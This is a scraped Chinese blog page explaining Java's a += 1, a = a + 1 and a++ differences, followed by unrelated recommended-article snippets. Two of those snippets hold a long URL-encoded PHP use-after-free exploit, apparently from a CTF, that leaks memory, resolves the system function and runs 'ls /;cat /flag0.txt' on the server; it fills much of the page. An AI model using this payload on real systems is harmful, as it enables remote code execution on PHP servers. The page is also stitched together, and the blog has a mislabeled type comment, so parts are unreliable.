a += 1、a = a + 1、a++区别

最新推荐文章于 2025-09-22 09:38:57 发布
原创 最新推荐文章于 2025-09-22 09:38:57 发布 · 7.9k 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#a++ #a += 1 #a = a +1

1、a += 1a = a + 1 区别
a类型不是int

byte a = 1;

a += 1;//1默认是int型,a为byte型,a+1有算术运算符,所以a会发生隐式转换变为int型,a+1的结果为int型,运行正常

a = a + 1;//a本身为byte型,不能直接赋值,该行会报错

a = (byte)(a+1);//需要强转,改为a=(byte)(a+1);就不会报错了

a类型是int

int a = 1;

a += 1; //1默认是int型,a为byte型,a+1有算术运算符,所以a会发生隐式转换变为int型,a+1的结果为int型,运行正常

a = a + 1; //a本身为int型,不用转型,不会保存,此时2种情况没有区别。

2、a++a = a + 1 区别

2种情况完全一样,a++a = a + 1的缩写

3、a++++a 区别

a++,a先执行表达式后再自增

++a ,a先自增再执行表达式

剖析C语言中a=a+++++a的无聊问题
08-27
同僚们闲聊,突然就聊到了a+++++a的问题。这种纯属C语言 “二” 级的问题应该是从a+++a引申出来的吧。于是乎兄弟姐妹们开始讨论它的运算结果,以及改如何理解。更有人写出(a++)+(++a) a+(++(++a)) ((a++)++)+a这样的...
python中not a_python中a=a+1与a+=1区别
weixin_39949894的博客
12-08 737
1、a=a+2,表示一个新的对象,新的对象名字还是a,但是指向的内存地址已经变了>>> a=2>>> id(a)140406287260016>>> a=a+2>>> a4>>> id(a)140406287259968所以对于tuple对象(不可变对象),也是可以这样操作的>>> tupl...
python中a+=1是什么意思_python-进阶-对象变动 a += 1与a = a+1区别
weixin_31143391的博客
12-23 3819
Python中可变(mutable)与不可变(immutable)的数据类型让新手很是头痛。简单的说,可变(mutable)意味着"可以被改动",而不可变(immutable)的意思是“常量(constant)”。想把脑筋转动起来吗?考虑下这个例子:foo = ['hi']print(foo)# Output: ['hi']bar = foo # bar 和...
深入探究 “a = a + 1” 与 “a += 1” 的异同
AC的博客
09-22 580
a = a + 1” 和 “a += 1” 在基本功能上对于大多数情况是等效的,都能实现对变量的加 1 操作。然而,在涉及自定义数据类型、复杂场景下的性能以及代码可读性和风格方面,它们存在一些差异。在实际编程中,开发者需要根据具体的应用场景、编程语言特性以及团队的代码风格规范来选择使用哪种表达式。理解这些细微差别,有助于编写更高效、易读且健壮的代码。希望通过本文对 “a = a + 1” 和 “a += 1” 的深入分析,能帮助读者在编程实践中做出更合适的选择。
++a a++?????????????????????????????
weixin_30487317的博客
11-09 462
a++:a先创建自身的一个副本,然后a自增1,最后返回副本的值 a+=1: 事实上相当于++a a=a+1: 虽然有点雷同于a+=1,但不同的是此时右值的a和1做相加操作,形成一个副本然后赋值给a,所以有额外操作 ++a:将a自增1并返回a 鉴于a++++a的差别,C++Primer建议用++a作为for循环的递增量 效率问题: 1.在内建数据类型时(即自增表示式的结果没有被使...
a = a + 1, a++++a ,a+=1区别
BennyShi1998的博客
10-23 1785
= a +1; 将a的值加1再赋给a;a+=1; 相当于 a = a+1;     a++; 是先将a的值赋给一个变量, 再自增     ++a; 先自增, 再把a的值给一个变量
c=%3F%3E%3C%3Fphp%0Apwn(%22ls+%2F%3Bcat+%2Fflag0.txt%22)%3B%0A+%0Afunction+pwn(%24cmd)+%7B%0A++++global+%24abc%2C+%24helper%2C+%24backtrace%3B%0A++++class+Vuln+%7B%0A++++++++public+%24a%3B%0A++++++++public+function+__destruct()+%7B+%0A++++++++++++global+%24backtrace%3B+%0A++++++++++++unset(%24this-%3Ea)%3B%0A++++++++++++%24backtrace+=+(new+Exception)-%3EgetTrace()%3B+%23+%3B)%0A++++++++++++if(%21isset(%24backtrace%5B1%5D%5B%27args%27%5D))+%7B+%23+PHP+%3E=+7.4%0A++++++++++++++++%24backtrace+=+debug_backtrace()%3B%0A++++++++++++%7D%0A++++++++%7D%0A++++%7D%0A+%0A++++class+Helper+%7B%0A++++++++public+%24a%2C+%24b%2C+%24c%2C+%24d%3B%0A++++%7D%0A+%0A++++function+str2ptr(%26%24str%2C+%24p+=+0%2C+%24s+=+8)+%7B%0A++++++++%24address+=+0%3B%0A++++++++for(%24j+=+%24s-1%3B+%24j+%3E=+0%3B+%24j--)+%7B%0A++++++++++++%24address+%3C%3C=+8%3B%0A++++++++++++%24address+%7C=+ord(%24str%5B%24p+%24j%5D)%3B%0A++++++++%7D%0A++++++++return+%24address%3B%0A++++%7D%0A+%0A++++function+ptr2str(%24ptr%2C+%24m+=+8)+%7B%0A++++++++%24out+=+%22%22%3B%0A++++++++for+(%24i=0%3B+%24i+%3C+%24m%3B+%24i++)+%7B%0A++++++++++++%24out+.=+sprintf(%27%25c%27%2C%24ptr+%26+0xff)%3B%0A++++++++++++%24ptr+%3E%3E=+8%3B%0A++++++++%7D%0A++++++++return+%24out%3B%0A++++%7D%0A+%0A++++function+write(%26%24str%2C+%24p%2C+%24v%2C+%24n+=+8)+%7B%0A++++++++%24i+=+0%3B%0A++++++++for(%24i+=+0%3B+%24i+%3C+%24n%3B+%24i++)+%7B%0A++++++++++++%24str%5B%24p+++%24i%5D+=+sprintf(%27%25c%27%2C%24v+%26+0xff)%3B%0A++++++++++++%24v+%3E%3E=+8%3B%0A++++++++%7D%0A++++%7D%0A+%0A++++function+leak(%24addr%2C+%24p+=+0%2C+%24s+=+8)+%7B%0A++++++++global+%24abc%2C+%24helper%3B%0A++++++++write(%24abc%2C+0x68%2C+%24addr+++%24p+-+0x10)%3B%0A++++++++%24leak+=+strlen(%24helper-%3Ea)%3B%0A++++++++if(%24s+%21=+8)+%7B+%24leak+%25=+2+%3C%3C+(%24s+*+8)+-+1%3B+%7D%0A++++++++return+%24leak%3B%0A++++%7D%0A+%0A++++function+parse_elf(%24base)+%7B%0A++++++++%24e_type+=+leak(%24base%2C+0x10%2C+2)%3B%0A+%0A++++++++%24e_phoff+=+leak(%24base%2C+0x20)%3B%0A++++++++%24e_phentsize+=+leak(%24base%2C+0x36%2C+2)%3B%0A++++++++%24e_phnum+=+leak(%24base%2C+0x38%2C+2)%3B%0A+%0A++++++++for(%24i+=+0%3B+%24i+%3C+%24e_phnum%3B+%24i++)+%7B%0A++++++++++++%24header+=+%24base+++%24e_phoff+++%24i+*+%24e_phentsize%3B%0A++++++++++++%24p_type++=+leak(%24header%2C+0%2C+4)%3B%0A++++++++++++%24p_flags+=+leak(%24header%2C+4%2C+4)%3B%0A++++++++++++%24p_vaddr+=+leak(%24header%2C+0x10)%3B%0A++++++++++++%24p_memsz+=+leak(%24header%2C+0x28)%3B%0A+%0A++++++++++++if(%24p_type+==+1+%26%26+%24p_flags+==+6)+%7B+%23+PT_LOAD%2C+PF_Read_Write%0A++++++++++++++++%23+handle+pie%0A++++++++++++++++%24data_addr+=+%24e_type+==+2+%3F+%24p_vaddr+%3A+%24base+++%24p_vaddr%3B%0A++++++++++++++++%24data_size+=+%24p_memsz%3B%0A++++++++++++%7D+else+if(%24p_type+==+1+%26%26+%24p_flags+==+5)+%7B+%23+PT_LOAD%2C+PF_Read_exec%0A++++++++++++++++%24text_size+=+%24p_memsz%3B%0A++++++++++++%7D%0A++++++++%7D%0A+%0A++++++++if(%21%24data_addr+%7C%7C+%21%24text_size+%7C%7C+%21%24data_size)%0A++++++++++++return+false%3B%0A+%0A++++++++return+%5B%24data_addr%2C+%24text_size%2C+%24data_size%5D%3B%0A++++%7D%0A+%0A++++function+get_basic_funcs(%24base%2C+%24elf)+%7B%0A++++++++list(%24data_addr%2C+%24text_size%2C+%24data_size)+=+%24elf%3B%0A++++++++for(%24i+=+0%3B+%24i+%3C+%24data_size+%2F+8%3B+%24i++)+%7B%0A++++++++++++%24leak+=+leak(%24data_addr%2C+%24i+*+8)%3B%0A++++++++++++if(%24leak+-+%24base+%3E+0+%26%26+%24leak+-+%24base+%3C+%24data_addr+-+%24base)+%7B%0A++++++++++++++++%24deref+=+leak(%24leak)%3B%0A++++++++++++++++%23+%27constant%27+constant+check%0A++++++++++++++++if(%24deref+%21=+0x746e6174736e6f63)%0A++++++++++++++++++++continue%3B%0A++++++++++++%7D+else+continue%3B%0A+%0A++++++++++++%24leak+=+leak(%24data_addr%2C+(%24i+++4)+*+8)%3B%0A++++++++++++if(%24leak+-+%24base+%3E+0+%26%26+%24leak+-+%24base+%3C+%24data_addr+-+%24base)+%7B%0A++++++++++++++++%24deref+=+leak(%24leak)%3B%0A++++++++++++++++%23+%27bin2hex%27+constant+check%0A++++++++++++++++if(%24deref+%21=+0x786568326e6962)%0A++++++++++++++++++++continue%3B%0A++++++++++++%7D+else+continue%3B%0A+%0A++++++++++++return+%24data_addr+++%24i+*+8%3B%0A++++++++%7D%0A++++%7D%0A+%0A++++function+get_binary_base(%24binary_leak)+%7B%0A++++++++%24base+=+0%3B%0A++++++++%24start+=+%24binary_leak+%26+0xfffffffffffff000%3B%0A++++++++for(%24i+=+0%3B+%24i+%3C+0x1000%3B+%24i++)+%7B%0A++++++++++++%24addr+=+%24start+-+0x1000+*+%24i%3B%0A++++++++++++%24leak+=+leak(%24addr%2C+0%2C+7)%3B%0A++++++++++++if(%24leak+==+0x10102464c457f)+%7B+%23+ELF+header%0A++++++++++++++++return+%24addr%3B%0A++++++++++++%7D%0A++++++++%7D%0A++++%7D%0A+%0A++++function+get_system(%24basic_funcs)+%7B%0A++++++++%24addr+=+%24basic_funcs%3B%0A++++++++do+%7B%0A++++++++++++%24f_entry+=+leak(%24addr)%3B%0A++++++++++++%24f_name+=+leak(%24f_entry%2C+0%2C+6)%3B%0A+%0A++++++++++++if(%24f_name+==+0x6d6574737973)+%7B+%23+system%0A++++++++++++++++return+leak(%24addr+++8)%3B%0A++++++++++++%7D%0A++++++++++++%24addr++=+0x20%3B%0A++++++++%7D+while(%24f_entry+%21=+0)%3B%0A++++++++return+false%3B%0A++++%7D%0A+%0A++++function+trigger_uaf(%24arg)+%7B%0A++++++++%23+str_shuffle+prevents+opcache+string+interning%0A++++++++%24arg+=+str_shuffle(%27AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%27)%3B%0A++++++++%24vuln+=+new+Vuln()%3B%0A++++++++%24vuln-%3Ea+=+%24arg%3B%0A++++%7D%0A+%0A++++if(stristr(PHP_OS%2C+%27WIN%27))+%7B%0A++++++++die(%27This+PoC+is+for+*nix+systems+only.%27)%3B%0A++++%7D%0A+%0A++++%24n_alloc+=+10%3B+%23+increase+this+value+if+UAF+fails%0A++++%24contiguous+=+%5B%5D%3B%0A++++for(%24i+=+0%3B+%24i+%3C+%24n_alloc%3B+%24i++)%0A++++++++%24contiguous%5B%5D+=+str_shuffle(%27AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%27)%3B%0A+%0A++++trigger_uaf(%27x%27)%3B%0A++++%24abc+=+%24backtrace%5B1%5D%5B%27args%27%5D%5B0%5D%3B%0A+%0A++++%24helper+=+new+Helper%3B%0A++++%24helper-%3Eb+=+function+(%24x)+%7B+%7D%3B%0A+%0A++++if(strlen(%24abc)+==+79+%7C%7C+strlen(%24abc)+==+0)+%7B%0A++++++++die(%22UAF+failed%22)%3B%0A++++%7D%0A+%0A++++%23+leaks%0A++++%24closure_handlers+=+str2ptr(%24abc%2C+0)%3B%0A++++%24php_heap+=+str2ptr(%24abc%2C+0x58)%3B%0A++++%24abc_addr+=+%24php_heap+-+0xc8%3B%0A+%0A++++%23+fake+value%0A++++write(%24abc%2C+0x60%2C+2)%3B%0A++++write(%24abc%2C+0x70%2C+6)%3B%0A+%0A++++%23+fake+reference%0A++++write(%24abc%2C+0x10%2C+%24abc_addr+++0x60)%3B%0A++++write(%24abc%2C+0x18%2C+0xa)%3B%0A+%0A++++%24closure_obj+=+str2ptr(%24abc%2C+0x20)%3B%0A+%0A++++%24binary_leak+=+leak(%24closure_handlers%2C+8)%3B%0A++++if(%21(%24base+=+get_binary_base(%24binary_leak)))+%7B%0A++++++++die(%22Couldn%27t+determine+binary+base+address%22)%3B%0A++++%7D%0A+%0A++++if(%21(%24elf+=+parse_elf(%24base)))+%7B%0A++++++++die(%22Couldn%27t+parse+ELF+header%22)%3B%0A++++%7D%0A+%0A++++if(%21(%24basic_funcs+=+get_basic_funcs(%24base%2C+%24elf)))+%7B%0A++++++++die(%22Couldn%27t+get+basic_functions+address%22)%3B%0A++++%7D%0A+%0A++++if(%21(%24zif_system+=+get_system(%24basic_funcs)))+%7B%0A++++++++die(%22Couldn%27t+get+zif_system+address%22)%3B%0A++++%7D%0A+%0A++++%23+fake+closure+object%0A++++%24fake_obj_offset+=+0xd0%3B%0A++++for(%24i+=+0%3B+%24i+%3C+0x110%3B+%24i++=+8)+%7B%0A++++++++write(%24abc%2C+%24fake_obj_offset+++%24i%2C+leak(%24closure_obj%2C+%24i))%3B%0A++++%7D%0A+%0A++++%23+pwn%0A++++write(%24abc%2C+0x20%2C+%24abc_addr+++%24fake_obj_offset)%3B%0A++++write(%24abc%2C+0xd0+++0x38%2C+1%2C+4)%3B+%23+internal+func+type%0A++++write(%24abc%2C+0xd0+++0x68%2C+%24zif_system)%3B+%23+internal+func+handler%0A+%0A++++(%24helper-%3Eb)(%24cmd)%3B%0A++++exit()%3B%0A%7D为什么这个获取不到结果
最新发布
01-05
} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec $text_size = $p_memsz; } } if(!$data_addr || !$text_size || !$data_size) return false; return [$data_addr, $text_size, $data...
``` int a = 1, b = 1, c = 0; if (1) { a += 1; b += a++; c += ++b; c++; }```a,b,c的值是什么?
09-28
然而,在大多数现代C++编译器中,`a++`会被先计算并返回原始值1,然后`b`会加1变为2,接着`a`会自增为2。所以`b += a++`实际上相当于`b += 1`,然后`b`变成3。接下来`c += ++b`会把`b`的当前值3传递给`c`,使`c`增加...
c=%3F%3E%3C%3Fphp%0Apwn%28%22ls+/%3Bcat+/flag0.txt%22%29%3B%0A%0Afunction+pwn%28%24cmd%29+%7B%0A++++global+%24abc%2C+%24helper%2C+%24backtrace%3B%0A++++class+Vuln+%7B%0A++++++++public+%24a%3B%0A++++++++public+function+__destruct%28%29+%7B+%0A++++++++++++global+%24backtrace%3B+%0A++++++++++++unset%28%24this-%3Ea%29%3B%0A++++++++++++%24backtrace+=+%28new+Exception%29-%3EgetTrace%28%29%3B+%23+%3B%29%0A++++++++++++if%28%21isset%28%24backtrace%5B1%5D%5B%27args%27%5D%29%29+%7B+%23+PHP+%3E=+7.4%0A++++++++++++++++%24backtrace+=+debug_backtrace%28%29%3B%0A++++++++++++%7D%0A++++++++%7D%0A++++%7D%0A%0A++++class+Helper+%7B%0A++++++++public+%24a%2C+%24b%2C+%24c%2C+%24d%3B%0A++++%7D%0A%0A++++function+str2ptr%28%26%24str%2C+%24p+=+0%2C+%24s+=+8%29+%7B%0A++++++++%24address+=+0%3B%0A++++++++for%28%24j+=+%24s-1%3B+%24j+%3E=+0%3B+%24j--%29+%7B%0A++++++++++++%24address+%3C%3C=+8%3B%0A++++++++++++%24address+%7C=+ord%28%24str%5B%24p+%24j%5D%29%3B%0A++++++++%7D%0A++++++++return+%24address%3B%0A++++%7D%0A%0A++++function+ptr2str%28%24ptr%2C+%24m+=+8%29+%7B%0A++++++++%24out+=+%22%22%3B%0A++++++++for+%28%24i=0%3B+%24i+%3C+%24m%3B+%24i++%29+%7B%0A++++++++++++%24out+.=+sprintf%28%27%25c%27%2C%24ptr+%26+0xff%29%3B%0A++++++++++++%24ptr+%3E%3E=+8%3B%0A++++++++%7D%0A++++++++return+%24out%3B%0A++++%7D%0A%0A++++function+write%28%26%24str%2C+%24p%2C+%24v%2C+%24n+=+8%29+%7B%0A++++++++%24i+=+0%3B%0A++++++++for%28%24i+=+0%3B+%24i+%3C+%24n%3B+%24i++%29+%7B%0A++++++++++++%24str%5B%24p+++%24i%5D+=+sprintf%28%27%25c%27%2C%24v+%26+0xff%29%3B%0A++++++++++++%24v+%3E%3E=+8%3B%0A++++++++%7D%0A++++%7D%0A%0A++++function+leak%28%24addr%2C+%24p+=+0%2C+%24s+=+8%29+%7B%0A++++++++global+%24abc%2C+%24helper%3B%0A++++++++write%28%24abc%2C+0x68%2C+%24addr+++%24p+-+0x10%29%3B%0A++++++++%24leak+=+strlen%28%24helper-%3Ea%29%3B%0A++++++++if%28%24s+%21=+8%29+%7B+%24leak+%25=+2+%3C%3C+%28%24s+*+8%29+-+1%3B+%7D%0A++++++++return+%24leak%3B%0A++++%7D%0A%0A++++function+parse_elf%28%24base%29+%7B%0A++++++++%24e_type+=+leak%28%24base%2C+0x10%2C+2%29%3B%0A%0A++++++++%24e_phoff+=+leak%28%24base%2C+0x20%29%3B%0A++++++++%24e_phentsize+=+leak%28%24base%2C+0x36%2C+2%29%3B%0A++++++++%24e_phnum+=+leak%28%24base%2C+0x38%2C+2%29%3B%0A%0A++++++++for%28%24i+=+0%3B+%24i+%3C+%24e_phnum%3B+%24i++%29+%7B%0A++++++++++++%24header+=+%24base+++%24e_phoff+++%24i+*+%24e_phentsize%3B%0A++++++++++++%24p_type++=+leak%28%24header%2C+0%2C+4%29%3B%0A++++++++++++%24p_flags+=+leak%28%24header%2C+4%2C+4%29%3B%0A++++++++++++%24p_vaddr+=+leak%28%24header%2C+0x10%29%3B%0A++++++++++++%24p_memsz+=+leak%28%24header%2C+0x28%29%3B%0A%0A++++++++++++if%28%24p_type+==+1+%26%26+%24p_flags+==+6%29+%7B+%23+PT_LOAD%2C+PF_Read_Write%0A++++++++++++++++%23+handle+pie%0A++++++++++++++++%24data_addr+=+%24e_type+==+2+%3F+%24p_vaddr+%3A+%24base+++%24p_vaddr%3B%0A++++++++++++++++%24data_size+=+%24p_memsz%3B%0A++++++++++++%7D+else+if%28%24p_type+==+1+%26%26+%24p_flags+==+5%29+%7B+%23+PT_LOAD%2C+PF_Read_exec%0A++++++++++++++++%24text_size+=+%24p_memsz%3B%0A++++++++++++%7D%0A++++++++%7D%0A%0A++++++++if%28%21%24data_addr+%7C%7C+%21%24text_size+%7C%7C+%21%24data_size%29%0A++++++++++++return+false%3B%0A%0A++++++++return+%5B%24data_addr%2C+%24text_size%2C+%24data_size%5D%3B%0A++++%7D%0A%0A++++function+get_basic_funcs%28%24base%2C+%24elf%29+%7B%0A++++++++list%28%24data_addr%2C+%24text_size%2C+%24data_size%29+=+%24elf%3B%0A++++++++for%28%24i+=+0%3B+%24i+%3C+%24data_size+/+8%3B+%24i++%29+%7B%0A++++++++++++%24leak+=+leak%28%24data_addr%2C+%24i+*+8%29%3B%0A++++++++++++if%28%24leak+-+%24base+%3E+0+%26%26+%24leak+-+%24base+%3C+%24data_addr+-+%24base%29+%7B%0A++++++++++++++++%24deref+=+leak%28%24leak%29%3B%0A++++++++++++++++%23+%27constant%27+constant+check%0A++++++++++++++++if%28%24deref+%21=+0x746e6174736e6f63%29%0A++++++++++++++++++++continue%3B%0A++++++++++++%7D+else+continue%3B%0A%0A++++++++++++%24leak+=+leak%28%24data_addr%2C+%28%24i+++4%29+*+8%29%3B%0A++++++++++++if%28%24leak+-+%24base+%3E+0+%26%26+%24leak+-+%24base+%3C+%24data_addr+-+%24base%29+%7B%0A++++++++++++++++%24deref+=+leak%28%24leak%29%3B%0A++++++++++++++++%23+%27bin2hex%27+constant+check%0A++++++++++++++++if%28%24deref+%21=+0x786568326e6962%29%0A++++++++++++++++++++continue%3B%0A++++++++++++%7D+else+continue%3B%0A%0A++++++++++++return+%24data_addr+++%24i+*+8%3B%0A++++++++%7D%0A++++%7D%0A%0A++++function+get_binary_base%28%24binary_leak%29+%7B%0A++++++++%24base+=+0%3B%0A++++++++%24start+=+%24binary_leak+%26+0xfffffffffffff000%3B%0A++++++++for%28%24i+=+0%3B+%24i+%3C+0x1000%3B+%24i++%29+%7B%0A++++++++++++%24addr+=+%24start+-+0x1000+*+%24i%3B%0A++++++++++++%24leak+=+leak%28%24addr%2C+0%2C+7%29%3B%0A++++++++++++if%28%24leak+==+0x10102464c457f%29+%7B+%23+ELF+header%0A++++++++++++++++return+%24addr%3B%0A++++++++++++%7D%0A++++++++%7D%0A++++%7D%0A%0A++++function+get_system%28%24basic_funcs%29+%7B%0A++++++++%24addr+=+%24basic_funcs%3B%0A++++++++do+%7B%0A++++++++++++%24f_entry+=+leak%28%24addr%29%3B%0A++++++++++++%24f_name+=+leak%28%24f_entry%2C+0%2C+6%29%3B%0A%0A++++++++++++if%28%24f_name+==+0x6d6574737973%29+%7B+%23+system%0A++++++++++++++++return+leak%28%24addr+++8%29%3B%0A++++++++++++%7D%0A++++++++++++%24addr++=+0x20%3B%0A++++++++%7D+while%28%24f_entry+%21=+0%29%3B%0A++++++++return+false%3B%0A++++%7D%0A%0A++++function+trigger_uaf%28%24arg%29+%7B%0A++++++++%23+str_shuffle+prevents+opcache+string+interning%0A++++++++%24arg+=+str_shuffle%28%27AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%27%29%3B%0A++++++++%24vuln+=+new+Vuln%28%29%3B%0A++++++++%24vuln-%3Ea+=+%24arg%3B%0A++++%7D%0A%0A++++if%28stristr%28PHP_OS%2C+%27WIN%27%29%29+%7B%0A++++++++die%28%27This+PoC+is+for+*nix+systems+only.%27%29%3B%0A++++%7D%0A%0A++++%24n_alloc+=+10%3B+%23+increase+this+value+if+UAF+fails%0A++++%24contiguous+=+%5B%5D%3B%0A++++for%28%24i+=+0%3B+%24i+%3C+%24n_alloc%3B+%24i++%29%0A++++++++%24contiguous%5B%5D+=+str_shuffle%28%27AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%27%29%3B%0A%0A++++trigger_uaf%28%27x%27%29%3B%0A++++%24abc+=+%24backtrace%5B1%5D%5B%27args%27%5D%5B0%5D%3B%0A%0A++++%24helper+=+new+Helper%3B%0A++++%24helper-%3Eb+=+function+%28%24x%29+%7B+%7D%3B%0A%0A++++if%28strlen%28%24abc%29+==+79+%7C%7C+strlen%28%24abc%29+==+0%29+%7B%0A++++++++die%28%22UAF+failed%22%29%3B%0A++++%7D%0A%0A++++%23+leaks%0A++++%24closure_handlers+=+str2ptr%28%24abc%2C+0%29%3B%0A++++%24php_heap+=+str2ptr%28%24abc%2C+0x58%29%3B%0A++++%24abc_addr+=+%24php_heap+-+0xc8%3B%0A%0A++++%23+fake+value%0A++++write%28%24abc%2C+0x60%2C+2%29%3B%0A++++write%28%24abc%2C+0x70%2C+6%29%3B%0A%0A++++%23+fake+reference%0A++++write%28%24abc%2C+0x10%2C+%24abc_addr+++0x60%29%3B%0A++++write%28%24abc%2C+0x18%2C+0xa%29%3B%0A%0A++++%24closure_obj+=+str2ptr%28%24abc%2C+0x20%29%3B%0A%0A++++%24binary_leak+=+leak%28%24closure_handlers%2C+8%29%3B%0A++++if%28%21%28%24base+=+get_binary_base%28%24binary_leak%29%29%29+%7B%0A++++++++die%28%22Couldn%27t+determine+binary+base+address%22%29%3B%0A++++%7D%0A%0A++++if%28%21%28%24elf+=+parse_elf%28%24base%29%29%29+%7B%0A++++++++die%28%22Couldn%27t+parse+ELF+header%22%29%3B%0A++++%7D%0A%0A++++if%28%21%28%24basic_funcs+=+get_basic_funcs%28%24base%2C+%24elf%29%29%29+%7B%0A++++++++die%28%22Couldn%27t+get+basic_functions+address%22%29%3B%0A++++%7D%0A%0A++++if%28%21%28%24zif_system+=+get_system%28%24basic_funcs%29%29%29+%7B%0A++++++++die%28%22Couldn%27t+get+zif_system+address%22%29%3B%0A++++%7D%0A%0A++++%23+fake+closure+object%0A++++%24fake_obj_offset+=+0xd0%3B%0A++++for%28%24i+=+0%3B+%24i+%3C+0x110%3B+%24i++=+8%29+%7B%0A++++++++write%28%24abc%2C+%24fake_obj_offset+++%24i%2C+leak%28%24closure_obj%2C+%24i%29%29%3B%0A++++%7D%0A%0A++++%23+pwn%0A++++write%28%24abc%2C+0x20%2C+%24abc_addr+++%24fake_obj_offset%29%3B%0A++++write%28%24abc%2C+0xd0+++0x38%2C+1%2C+4%29%3B+%23+internal+func+type%0A++++write%28%24abc%2C+0xd0+++0x68%2C+%24zif_system%29%3B+%23+internal+func+handler%0A%0A++++%28%24helper-%3Eb%29%28%24cmd%29%3B%0A++++exit%28%29%3B%0A%7D和c=%3f%3e%3c%3fphp%0apwn(%22ls+%2f%3bcat+%2fflag0.txt%22)%3b%0a%0afunction+pwn(%24cmd)+%7b%0a++++global+%24abc%2c+%24helper%2c+%24backtrace%3b%0a++++class+Vuln+%7b%0a++++++++public+%24a%3b%0a++++++++public+function+__destruct()+%7b+%0a++++++++++++global+%24backtrace%3b+%0a++++++++++++unset(%24this-%3ea)%3b%0a++++++++++++%24backtrace+%3d+(new+Exception)-%3egetTrace()%3b+%23+%3b)%0a++++++++++++if(!isset(%24backtrace%5b1%5d%5b%27args%27%5d))+%7b+%23+PHP+%3e%3d+7.4%0a++++++++++++++++%24backtrace+%3d+debug_backtrace()%3b%0a++++++++++++%7d%0a++++++++%7d%0a++++%7d%0a%0a++++class+Helper+%7b%0a++++++++public+%24a%2c+%24b%2c+%24c%2c+%24d%3b%0a++++%7d%0a%0a++++function+str2ptr(%26%24str%2c+%24p+%3d+0%2c+%24s+%3d+8)+%7b%0a++++++++%24address+%3d+0%3b%0a++++++++for(%24j+%3d+%24s-1%3b+%24j+%3e%3d+0%3b+%24j--)+%7b%0a++++++++++++%24address+%3c%3c%3d+8%3b%0a++++++++++++%24address+%7c%3d+ord(%24str%5b%24p%2b%24j%5d)%3b%0a++++++++%7d%0a++++++++return+%24address%3b%0a++++%7d%0a%0a++++function+ptr2str(%24ptr%2c+%24m+%3d+8)+%7b%0a++++++++%24out+%3d+%22%22%3b%0a++++++++for+(%24i%3d0%3b+%24i+%3c+%24m%3b+%24i%2b%2b)+%7b%0a++++++++++++%24out+.%3d+sprintf(%27%25c%27%2c%24ptr+%26+0xff)%3b%0a++++++++++++%24ptr+%3e%3e%3d+8%3b%0a++++++++%7d%0a++++++++return+%24out%3b%0a++++%7d%0a%0a++++function+write(%26%24str%2c+%24p%2c+%24v%2c+%24n+%3d+8)+%7b%0a++++++++%24i+%3d+0%3b%0a++++++++for(%24i+%3d+0%3b+%24i+%3c+%24n%3b+%24i%2b%2b)+%7b%0a++++++++++++%24str%5b%24p+%2b+%24i%5d+%3d+sprintf(%27%25c%27%2c%24v+%26+0xff)%3b%0a++++++++++++%24v+%3e%3e%3d+8%3b%0a++++++++%7d%0a++++%7d%0a%0a++++function+leak(%24addr%2c+%24p+%3d+0%2c+%24s+%3d+8)+%7b%0a++++++++global+%24abc%2c+%24helper%3b%0a++++++++write(%24abc%2c+0x68%2c+%24addr+%2b+%24p+-+0x10)%3b%0a++++++++%24leak+%3d+strlen(%24helper-%3ea)%3b%0a++++++++if(%24s+!%3d+8)+%7b+%24leak+%25%3d+2+%3c%3c+(%24s+*+8)+-+1%3b+%7d%0a++++++++return+%24leak%3b%0a++++%7d%0a%0a++++function+parse_elf(%24base)+%7b%0a++++++++%24e_type+%3d+leak(%24base%2c+0x10%2c+2)%3b%0a%0a++++++++%24e_phoff+%3d+leak(%24base%2c+0x20)%3b%0a++++++++%24e_phentsize+%3d+leak(%24base%2c+0x36%2c+2)%3b%0a++++++++%24e_phnum+%3d+leak(%24base%2c+0x38%2c+2)%3b%0a%0a++++++++for(%24i+%3d+0%3b+%24i+%3c+%24e_phnum%3b+%24i%2b%2b)+%7b%0a++++++++++++%24header+%3d+%24base+%2b+%24e_phoff+%2b+%24i+*+%24e_phentsize%3b%0a++++++++++++%24p_type++%3d+leak(%24header%2c+0%2c+4)%3b%0a++++++++++++%24p_flags+%3d+leak(%24header%2c+4%2c+4)%3b%0a++++++++++++%24p_vaddr+%3d+leak(%24header%2c+0x10)%3b%0a++++++++++++%24p_memsz+%3d+leak(%24header%2c+0x28)%3b%0a%0a++++++++++++if(%24p_type+%3d%3d+1+%26%26+%24p_flags+%3d%3d+6)+%7b+%23+PT_LOAD%2c+PF_Read_Write%0a++++++++++++++++%23+handle+pie%0a++++++++++++++++%24data_addr+%3d+%24e_type+%3d%3d+2+%3f+%24p_vaddr+%3a+%24base+%2b+%24p_vaddr%3b%0a++++++++++++++++%24data_size+%3d+%24p_memsz%3b%0a++++++++++++%7d+else+if(%24p_type+%3d%3d+1+%26%26+%24p_flags+%3d%3d+5)+%7b+%23+PT_LOAD%2c+PF_Read_exec%0a++++++++++++++++%24text_size+%3d+%24p_memsz%3b%0a++++++++++++%7d%0a++++++++%7d%0a%0a++++++++if(!%24data_addr+%7c%7c+!%24text_size+%7c%7c+!%24data_size)%0a++++++++++++return+false%3b%0a%0a++++++++return+%5b%24data_addr%2c+%24text_size%2c+%24data_size%5d%3b%0a++++%7d%0a%0a++++function+get_basic_funcs(%24base%2c+%24elf)+%7b%0a++++++++list(%24data_addr%2c+%24text_size%2c+%24data_size)+%3d+%24elf%3b%0a++++++++for(%24i+%3d+0%3b+%24i+%3c+%24data_size+%2f+8%3b+%24i%2b%2b)+%7b%0a++++++++++++%24leak+%3d+leak(%24data_addr%2c+%24i+*+8)%3b%0a++++++++++++if(%24leak+-+%24base+%3e+0+%26%26+%24leak+-+%24base+%3c+%24data_addr+-+%24base)+%7b%0a++++++++++++++++%24deref+%3d+leak(%24leak)%3b%0a++++++++++++++++%23+%27constant%27+constant+check%0a++++++++++++++++if(%24deref+!%3d+0x746e6174736e6f63)